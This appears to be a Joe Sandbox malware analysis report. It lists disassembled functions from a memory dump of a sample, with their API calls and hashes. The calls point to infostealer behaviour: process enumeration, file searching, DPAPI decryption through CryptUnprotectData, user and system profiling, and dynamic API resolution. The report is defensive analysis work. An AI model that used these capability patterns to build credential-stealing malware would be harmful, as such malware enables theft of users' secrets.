Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 18d2a5560c6a78707666b2b1cbd10da6feae12a0456885b012e6c21fcab98be3
Instruction ID: f89c6fcdd3b9f925996d808dad525326ec298b30eb97fddc4683e2ff6a3b66a3
Opcode Fuzzy Hash: 18d2a5560c6a78707666b2b1cbd10da6feae12a0456885b012e6c21fcab98be3
Instruction Fuzzy Hash: 6C129A339106185BDB16FB70EE96EED7378AF54300F40419AB50A9A291EF306F49DF92

Function 003D9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003D961E
Process32First.KERNEL32(003E0ACA,00000128), ref: 003D9632
Process32Next.KERNEL32(003E0ACA,00000128), ref: 003D9647
StrCmpCA.SHLWAPI(?,00000000), ref: 003D965C
CloseHandle.KERNEL32(003E0ACA), ref: 003D967A

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d6e0ddd670215724d6625c2ef5007db5d5c732883868a3dd892e61e580958fdf
Instruction ID: e5f108ff7d761bbdc2ec172846ce362a9f0de96021eb836255c34e4cbe44c845
Opcode Fuzzy Hash: d6e0ddd670215724d6625c2ef5007db5d5c732883868a3dd892e61e580958fdf
Instruction Fuzzy Hash: 05010C75A40308ABDB15DFA5DD48BEEB7F9EB48750F10818AA90596380D734DB40CF51

Function 003D7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EBDD90,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7A63
RtlAllocateHeap.NTDLL(00000000), ref: 003D7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EBDD90,00000000,?,003E0E10,00000000,?,00000000,00000000,?), ref: 003D7A7D
wsprintfA.USER32 ref: 003D7AB7

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 7f7e7637bce7f6a19408d9063fc070449b1de1e510d55f5e568004c56f6862af
Instruction ID: 560cc999b85ad00f3075003522759a88539d2fcc40bd6e40200ca4cc4f997faf
Opcode Fuzzy Hash: 7f7e7637bce7f6a19408d9063fc070449b1de1e510d55f5e568004c56f6862af
Instruction Fuzzy Hash: B7115EB1A85228EBEB20CB54DC49FAAB778FB04761F10479AE91A933C0D7745A40CF51

Function 003C9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 003C9BA3
LocalFree.KERNEL32(?), ref: 003C9BD3

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7265985f38235abc33d39d78833cdf8a172544605860a321c96c56ef9d5bb1f5
Instruction ID: a96e25a74e12edd97b8fdff4ca86a2746fe10b592cf318d4e32cb69126fcbfbe
Opcode Fuzzy Hash: 7265985f38235abc33d39d78833cdf8a172544605860a321c96c56ef9d5bb1f5
Instruction Fuzzy Hash: 1611CCB8A00209EFDB05DF94D985EAE77B5FF88300F108559E91597390D774AE11CF61

Function 003D7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 5facb396f9baeb0337dddaa057a3546471be5a6f4be2312257fdfa13ca466ee1
Instruction ID: b30a99e798699cc93b33547d62c43cf20ab1b12a40f443273e23e9dd4013f76c
Opcode Fuzzy Hash: 5facb396f9baeb0337dddaa057a3546471be5a6f4be2312257fdfa13ca466ee1
Instruction Fuzzy Hash: CCF04FB2944208ABC700DFD8DD4ABAFBBB8EB04751F10465AFA05A2780C77415048BA1

Function 003C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 003C116A
ExitProcess.KERNEL32 ref: 003C117E

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: f61e080708d27f48a9950eeceb82dba3230fc2a44c9cbc4332babbc2cf342855
Instruction ID: 0655a85d8a9ed206994c3aa3174b8f3ebdaf735d14dea5c15f3edb15555db34a
Opcode Fuzzy Hash: f61e080708d27f48a9950eeceb82dba3230fc2a44c9cbc4332babbc2cf342855
Instruction Fuzzy Hash: 9AD05E7894030CDBCB00DFE0D849ADEBB79FB08311F001558D90562340EA305881CBA6

Function 003D9C10 Relevance: 231.7, APIs: 112, Strings: 20, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,00EA6720), ref: 003D9C2D
GetProcAddress.KERNEL32(75550000,00EA6980), ref: 003D9C45
GetProcAddress.KERNEL32(75550000,00EB8F88), ref: 003D9C5E
GetProcAddress.KERNEL32(75550000,00EB8FA0), ref: 003D9C76
GetProcAddress.KERNEL32(75550000,00EBC828), ref: 003D9C8E
GetProcAddress.KERNEL32(75550000,00EBCAC8), ref: 003D9CA7
GetProcAddress.KERNEL32(75550000,00EAB310), ref: 003D9CBF
GetProcAddress.KERNEL32(75550000,00EBC8E8), ref: 003D9CD7
GetProcAddress.KERNEL32(75550000,00EBCAB0), ref: 003D9CF0
GetProcAddress.KERNEL32(75550000,00EBC8D0), ref: 003D9D08
GetProcAddress.KERNEL32(75550000,00EBC8B8), ref: 003D9D20
GetProcAddress.KERNEL32(75550000,00EA6860), ref: 003D9D39
GetProcAddress.KERNEL32(75550000,00EA68A0), ref: 003D9D51
GetProcAddress.KERNEL32(75550000,00EA69A0), ref: 003D9D69
GetProcAddress.KERNEL32(75550000,00EA66A0), ref: 003D9D82
GetProcAddress.KERNEL32(75550000,00EBCAE0), ref: 003D9D9A
GetProcAddress.KERNEL32(75550000,00EBC990), ref: 003D9DB2
GetProcAddress.KERNEL32(75550000,00EAB090), ref: 003D9DCB
GetProcAddress.KERNEL32(75550000,00EA66C0), ref: 003D9DE3
GetProcAddress.KERNEL32(75550000,00EBCA08), ref: 003D9DFB
GetProcAddress.KERNEL32(75550000,00EBCA20), ref: 003D9E14
GetProcAddress.KERNEL32(75550000,00EBC858), ref: 003D9E2C
GetProcAddress.KERNEL32(75550000,00EBCAF8), ref: 003D9E44
GetProcAddress.KERNEL32(75550000,00EA6740), ref: 003D9E5D
GetProcAddress.KERNEL32(75550000,00EBC810), ref: 003D9E75
GetProcAddress.KERNEL32(75550000,00EBCA38), ref: 003D9E8D
GetProcAddress.KERNEL32(75550000,00EBCA68), ref: 003D9EA6
GetProcAddress.KERNEL32(75550000,00EBC930), ref: 003D9EBE
GetProcAddress.KERNEL32(75550000,00EBC900), ref: 003D9ED6
GetProcAddress.KERNEL32(75550000,00EBC9A8), ref: 003D9EEF
GetProcAddress.KERNEL32(75550000,00EBC840), ref: 003D9F07
GetProcAddress.KERNEL32(75550000,00EBCA50), ref: 003D9F1F
GetProcAddress.KERNEL32(75550000,00EBC948), ref: 003D9F38
GetProcAddress.KERNEL32(75550000,00EB9C08), ref: 003D9F50
GetProcAddress.KERNEL32(75550000,00EBC8A0), ref: 003D9F68
GetProcAddress.KERNEL32(75550000,00EBC870), ref: 003D9F81
GetProcAddress.KERNEL32(75550000,00EA6760), ref: 003D9F99
GetProcAddress.KERNEL32(75550000,00EBC888), ref: 003D9FB1
GetProcAddress.KERNEL32(75550000,00EA6780), ref: 003D9FCA
GetProcAddress.KERNEL32(75550000,00EBC918), ref: 003D9FE2
GetProcAddress.KERNEL32(75550000,00EBCA80), ref: 003D9FFA
GetProcAddress.KERNEL32(75550000,00EA63E0), ref: 003DA013
GetProcAddress.KERNEL32(75550000,00EA62A0), ref: 003DA02B
LoadLibraryA.KERNEL32(00EBCA98,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA03D
LoadLibraryA.KERNEL32(00EBC960,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA04E
LoadLibraryA.KERNEL32(00EBC978,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA060
LoadLibraryA.KERNEL32(00EBC9C0,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA072
LoadLibraryA.KERNEL32(00EBC9D8,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA083
LoadLibraryA.KERNEL32(00EBC9F0,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA095
LoadLibraryA.KERNEL32(00EBCC90,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA0A7
LoadLibraryA.KERNEL32(00EBCBA0,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA0B8
GetProcAddress.KERNEL32(75750000,00EA6660), ref: 003DA0DA
GetProcAddress.KERNEL32(75750000,00EBCC30), ref: 003DA0F2
GetProcAddress.KERNEL32(75750000,00EB8920), ref: 003DA10A
GetProcAddress.KERNEL32(75750000,00EBCDB0), ref: 003DA123
GetProcAddress.KERNEL32(75750000,00EA6280), ref: 003DA13B
GetProcAddress.KERNEL32(739E0000,00EAAE88), ref: 003DA160
GetProcAddress.KERNEL32(739E0000,00EA6440), ref: 003DA179
GetProcAddress.KERNEL32(739E0000,00EAB1A8), ref: 003DA191
GetProcAddress.KERNEL32(739E0000,00EBCC48), ref: 003DA1A9
GetProcAddress.KERNEL32(739E0000,00EBCBB8), ref: 003DA1C2
GetProcAddress.KERNEL32(739E0000,00EA6400), ref: 003DA1DA
GetProcAddress.KERNEL32(739E0000,00EA64E0), ref: 003DA1F2
GetProcAddress.KERNEL32(739E0000,00EBCCA8), ref: 003DA20B
GetProcAddress.KERNEL32(757E0000,00EA6500), ref: 003DA22C
GetProcAddress.KERNEL32(757E0000,00EA6620), ref: 003DA244
GetProcAddress.KERNEL32(757E0000,00EBCC60), ref: 003DA25D
GetProcAddress.KERNEL32(757E0000,00EBCB58), ref: 003DA275
GetProcAddress.KERNEL32(757E0000,00EA6420), ref: 003DA28D
GetProcAddress.KERNEL32(758D0000,00EAB220), ref: 003DA2B3
GetProcAddress.KERNEL32(758D0000,00EAB158), ref: 003DA2CB
GetProcAddress.KERNEL32(758D0000,00EBCD98), ref: 003DA2E3
GetProcAddress.KERNEL32(758D0000,00EA6480), ref: 003DA2FC
GetProcAddress.KERNEL32(758D0000,00EA6520), ref: 003DA314
GetProcAddress.KERNEL32(758D0000,00EAB1D0), ref: 003DA32C
GetProcAddress.KERNEL32(76BE0000,00EBCD80), ref: 003DA352
GetProcAddress.KERNEL32(76BE0000,00EA6540), ref: 003DA36A
GetProcAddress.KERNEL32(76BE0000,00EB87F0), ref: 003DA382
GetProcAddress.KERNEL32(76BE0000,00EBCC00), ref: 003DA39B
GetProcAddress.KERNEL32(76BE0000,00EBCDF8), ref: 003DA3B3
GetProcAddress.KERNEL32(76BE0000,00EA6600), ref: 003DA3CB
GetProcAddress.KERNEL32(76BE0000,00EA6460), ref: 003DA3E4
GetProcAddress.KERNEL32(76BE0000,00EBCCF0), ref: 003DA3FC
GetProcAddress.KERNEL32(76BE0000,00EBCCC0), ref: 003DA414
GetProcAddress.KERNEL32(75670000,00EA6560), ref: 003DA436
GetProcAddress.KERNEL32(75670000,00EBCB28), ref: 003DA44E
GetProcAddress.KERNEL32(75670000,00EBCD38), ref: 003DA466
GetProcAddress.KERNEL32(75670000,00EBCD08), ref: 003DA47F
GetProcAddress.KERNEL32(75670000,00EBCC78), ref: 003DA497
GetProcAddress.KERNEL32(759D0000,00EA65C0), ref: 003DA4B8
GetProcAddress.KERNEL32(759D0000,00EA6580), ref: 003DA4D1
GetProcAddress.KERNEL32(76D80000,00EA6340), ref: 003DA4F2
GetProcAddress.KERNEL32(76D80000,00EBCCD8), ref: 003DA50A
GetProcAddress.KERNEL32(6F5C0000,00EA64A0), ref: 003DA530
GetProcAddress.KERNEL32(6F5C0000,00EA65A0), ref: 003DA548
GetProcAddress.KERNEL32(6F5C0000,00EA63C0), ref: 003DA560
GetProcAddress.KERNEL32(6F5C0000,00EBCB10), ref: 003DA579
GetProcAddress.KERNEL32(6F5C0000,00EA6300), ref: 003DA591
GetProcAddress.KERNEL32(6F5C0000,00EA64C0), ref: 003DA5A9
GetProcAddress.KERNEL32(6F5C0000,00EA62C0), ref: 003DA5C2
GetProcAddress.KERNEL32(6F5C0000,00EA65E0), ref: 003DA5DA
GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 003DA5F1
GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 003DA607
GetProcAddress.KERNEL32(75480000,00EBCB40), ref: 003DA629
GetProcAddress.KERNEL32(75480000,00EB8800), ref: 003DA641
GetProcAddress.KERNEL32(75480000,00EBCD20), ref: 003DA659
GetProcAddress.KERNEL32(75480000,00EBCDC8), ref: 003DA672
GetProcAddress.KERNEL32(753B0000,00EA6320), ref: 003DA693
GetProcAddress.KERNEL32(6FF20000,00EBCDE0), ref: 003DA6B4
GetProcAddress.KERNEL32(6FF20000,00EA6640), ref: 003DA6CD
GetProcAddress.KERNEL32(6FF20000,00EBCBD0), ref: 003DA6E5
